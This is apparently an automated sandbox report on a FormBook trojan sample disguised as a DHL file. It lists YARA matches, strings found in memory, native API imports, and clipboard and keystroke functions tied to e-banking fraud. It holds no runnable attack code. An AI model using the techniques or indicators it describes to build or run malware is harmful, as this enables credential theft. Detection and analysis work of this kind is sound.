            Source: netbtugc.exe, 00000004.00000002.4475931806.000000000773A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: netbtugc.exe, 00000004.00000002.4475931806.000000000773A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: netbtugc.exe, 00000004.00000002.4474120065.0000000004322000.00000004.10000000.00040000.00000000.sdmp, oYzsgiLOOTqCTABCCGZlOCaAgG.exe, 00000006.00000002.4473658258.0000000003922000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://codepen.io/uzcho_/pen/eYdmdXw.css
            Source: netbtugc.exe, 00000004.00000002.4474120065.0000000004322000.00000004.10000000.00040000.00000000.sdmp, oYzsgiLOOTqCTABCCGZlOCaAgG.exe, 00000006.00000002.4473658258.0000000003922000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://codepen.io/uzcho_/pens/popular/?grid_type=list
            Source: netbtugc.exe, 00000004.00000002.4475931806.000000000773A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: netbtugc.exe, 00000004.00000002.4475931806.000000000773A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: netbtugc.exe, 00000004.00000002.4475931806.000000000773A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: netbtugc.exe, 00000004.00000002.4472527689.00000000028DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: netbtugc.exe, 00000004.00000002.4472527689.00000000028DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: netbtugc.exe, 00000004.00000002.4472527689.00000000028DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: netbtugc.exe, 00000004.00000002.4472527689.00000000028DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: netbtugc.exe, 00000004.00000002.4472527689.00000000028DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: netbtugc.exe, 00000004.00000002.4472527689.00000000028DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: netbtugc.exe, 00000004.00000003.2387752917.000000000771D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: netbtugc.exe, 00000004.00000002.4475931806.000000000773A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: netbtugc.exe, 00000004.00000002.4474120065.000000000496A000.00000004.10000000.00040000.00000000.sdmp, oYzsgiLOOTqCTABCCGZlOCaAgG.exe, 00000006.00000002.4473658258.0000000003F6A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.empowermedeco.com/fo8o/?k0=mxnR
            Source: netbtugc.exe, 00000004.00000002.4474120065.0000000003FFE000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4475817977.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, oYzsgiLOOTqCTABCCGZlOCaAgG.exe, 00000006.00000002.4473658258.00000000035FE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_
            Source: oYzsgiLOOTqCTABCCGZlOCaAgG.exe, 00000006.00000002.4473658258.00000000035FE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.sedo.com/services/parking.php3
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_00824164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00824164
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_00824164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00824164
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_00823F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00823F66
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_0081001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_0081001C
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_0083CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0083CABC

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.4472233099.0000000000660000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2201456108.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4473466571.0000000002BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4473431930.0000000003090000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4475242478.0000000004E70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4473348288.0000000002A30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2202258982.0000000003650000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2202388210.0000000004090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4472233099.0000000000660000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2201456108.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4473466571.0000000002BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.4473431930.0000000003090000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4475242478.0000000004E70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4473348288.0000000002A30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2202258982.0000000003650000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2202388210.0000000004090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Binary is likely a compiled AutoIt script file
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: This is a third-party compiled AutoIt script.0_2_007B3B3A
            Source: DHL 40312052024.exeString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: DHL 40312052024.exe, 00000000.00000000.2014630945.0000000000864000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_019dc59f-1
            Source: DHL 40312052024.exe, 00000000.00000000.2014630945.0000000000864000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_935dc8e3-b
            Source: DHL 40312052024.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_fc301743-4
            Source: DHL 40312052024.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_66aeed68-a
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042B363 NtClose,2_2_0042B363
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372B60 NtClose,LdrInitializeThunk,2_2_03372B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03372DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_03372C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033735C0 NtCreateMutant,LdrInitializeThunk,2_2_033735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03374340 NtSetContextThread,2_2_03374340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03374650 NtSuspendThread,2_2_03374650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372BA0 NtEnumerateValueKey,2_2_03372BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372B80 NtQueryInformationFile,2_2_03372B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372BF0 NtAllocateVirtualMemory,2_2_03372BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372BE0 NtQueryValueKey,2_2_03372BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372AB0 NtWaitForSingleObject,2_2_03372AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372AF0 NtWriteFile,2_2_03372AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372AD0 NtReadFile,2_2_03372AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372F30 NtCreateSection,2_2_03372F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372F60 NtCreateProcessEx,2_2_03372F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372FB0 NtResumeThread,2_2_03372FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372FA0 NtQuerySection,2_2_03372FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372F90 NtProtectVirtualMemory,2_2_03372F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372FE0 NtCreateFile,2_2_03372FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372E30 NtWriteVirtualMemory,2_2_03372E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372EA0 NtAdjustPrivilegesToken,2_2_03372EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372E80 NtReadVirtualMemory,2_2_03372E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372EE0 NtQueueApcThread,2_2_03372EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372D30 NtUnmapViewOfSection,2_2_03372D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372D10 NtMapViewOfSection,2_2_03372D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372D00 NtSetInformationFile,2_2_03372D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372DB0 NtEnumerateKey,2_2_03372DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372DD0 NtDelayExecution,2_2_03372DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372C00 NtQueryInformationProcess,2_2_03372C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372C60 NtCreateKey,2_2_03372C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372CA0 NtQueryInformationToken,2_2_03372CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372CF0 NtOpenProcess,2_2_03372CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372CC0 NtQueryVirtualMemory,2_2_03372CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03373010 NtOpenDirectoryObject,2_2_03373010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03373090 NtSetValueKey,2_2_03373090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033739B0 NtGetContextThread,2_2_033739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03373D10 NtOpenProcessToken,2_2_03373D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03373D70 NtOpenThread,2_2_03373D70
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_0081A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_0081A1EF
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_00808310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00808310
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_008151BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_008151BD
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_007BE6A00_2_007BE6A0
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_007DD9750_2_007DD975
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_007BFCE00_2_007BFCE0
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_007D21C50_2_007D21C5
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_007E62D20_2_007E62D2
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_008303DA0_2_008303DA
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_007E242E0_2_007E242E
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_007D25FA0_2_007D25FA
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_0080E6160_2_0080E616
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_007C66E10_2_007C66E1
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_007E878F0_2_007E878F
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_008188890_2_00818889
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_007E68440_2_007E6844
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_007C88080_2_007C8808
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_008308570_2_00830857
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_007DCB210_2_007DCB21
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_007E6DB60_2_007E6DB6
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_007C6F9E0_2_007C6F9E
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_007C30300_2_007C3030
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_007DF1D90_2_007DF1D9
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_007D31870_2_007D3187
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_007B12870_2_007B1287
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_007D14840_2_007D1484
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_007C55200_2_007C5520
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_007D76960_2_007D7696
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_007C57600_2_007C5760
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_007D19780_2_007D1978
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_007E9AB50_2_007E9AB5
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_00837DDB0_2_00837DDB
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_007DBDA60_2_007DBDA6
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_007D1D900_2_007D1D90
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_007BDF000_2_007BDF00
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_007C3FE00_2_007C3FE0
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_0149DC480_2_0149DC48
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004168712_2_00416871
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004168732_2_00416873
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004028A02_2_004028A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004101732_2_00410173
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004011102_2_00401110
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E1F32_2_0040E1F3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004012902_2_00401290
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004035002_2_00403500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040268A2_2_0040268A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004026982_2_00402698
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004026A02_2_004026A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FF4A2_2_0040FF4A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042D7532_2_0042D753
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FF532_2_0040FF53
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FA3522_2_033FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034003E62_2_034003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334E3F02_2_0334E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E02742_2_033E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C02C02_2_033C02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DA1182_2_033DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033301002_2_03330100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C81582_2_033C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F41A22_2_033F41A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034001AA2_2_034001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F81CC2_2_033F81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D20002_2_033D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033407702_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033647502_2_03364750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333C7C02_2_0333C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335C6E02_2_0335C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033405352_2_03340535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034005912_2_03400591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E44202_2_033E4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F24462_2_033F2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033EE4F62_2_033EE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FAB402_2_033FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F6BD72_2_033F6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333EA802_2_0333EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033569622_2_03356962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033429A02_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0340A9A62_2_0340A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334A8402_2_0334A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033428402_2_03342840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033268B82_2_033268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E8F02_2_0336E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03360F302_2_03360F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E2F302_2_033E2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03382F282_2_03382F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B4F402_2_033B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033BEFA02_2_033BEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334CFE02_2_0334CFE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03332FC82_2_03332FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FEE262_2_033FEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340E592_2_03340E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03352E902_2_03352E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FCE932_2_033FCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FEEDB2_2_033FEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DCD1F2_2_033DCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334AD002_2_0334AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03358DBF2_2_03358DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333ADE02_2_0333ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340C002_2_03340C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E0CB52_2_033E0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03330CF22_2_03330CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F132D2_2_033F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332D34C2_2_0332D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0338739A2_2_0338739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033452A02_2_033452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E12ED2_2_033E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335B2C02_2_0335B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0340B16B2_2_0340B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332F1722_2_0332F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0337516C2_2_0337516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334B1B02_2_0334B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F70E92_2_033F70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FF0E02_2_033FF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033EF0CC2_2_033EF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033470C02_2_033470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FF7B02_2_033FF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F16CC2_2_033F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F75712_2_033F7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DD5B02_2_033DD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FF43F2_2_033FF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033314602_2_03331460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FFB762_2_033FFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335FB802_2_0335FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B5BF02_2_033B5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0337DBF92_2_0337DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B3A6C2_2_033B3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FFA492_2_033FFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F7A462_2_033F7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DDAAC2_2_033DDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03385AA02_2_03385AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E1AA32_2_033E1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033EDAC62_2_033EDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D59102_2_033D5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033499502_2_03349950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335B9502_2_0335B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AD8002_2_033AD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033438E02_2_033438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FFF092_2_033FFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FFFB12_2_033FFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03341F922_2_03341F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03349EB02_2_03349EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F7D732_2_033F7D73
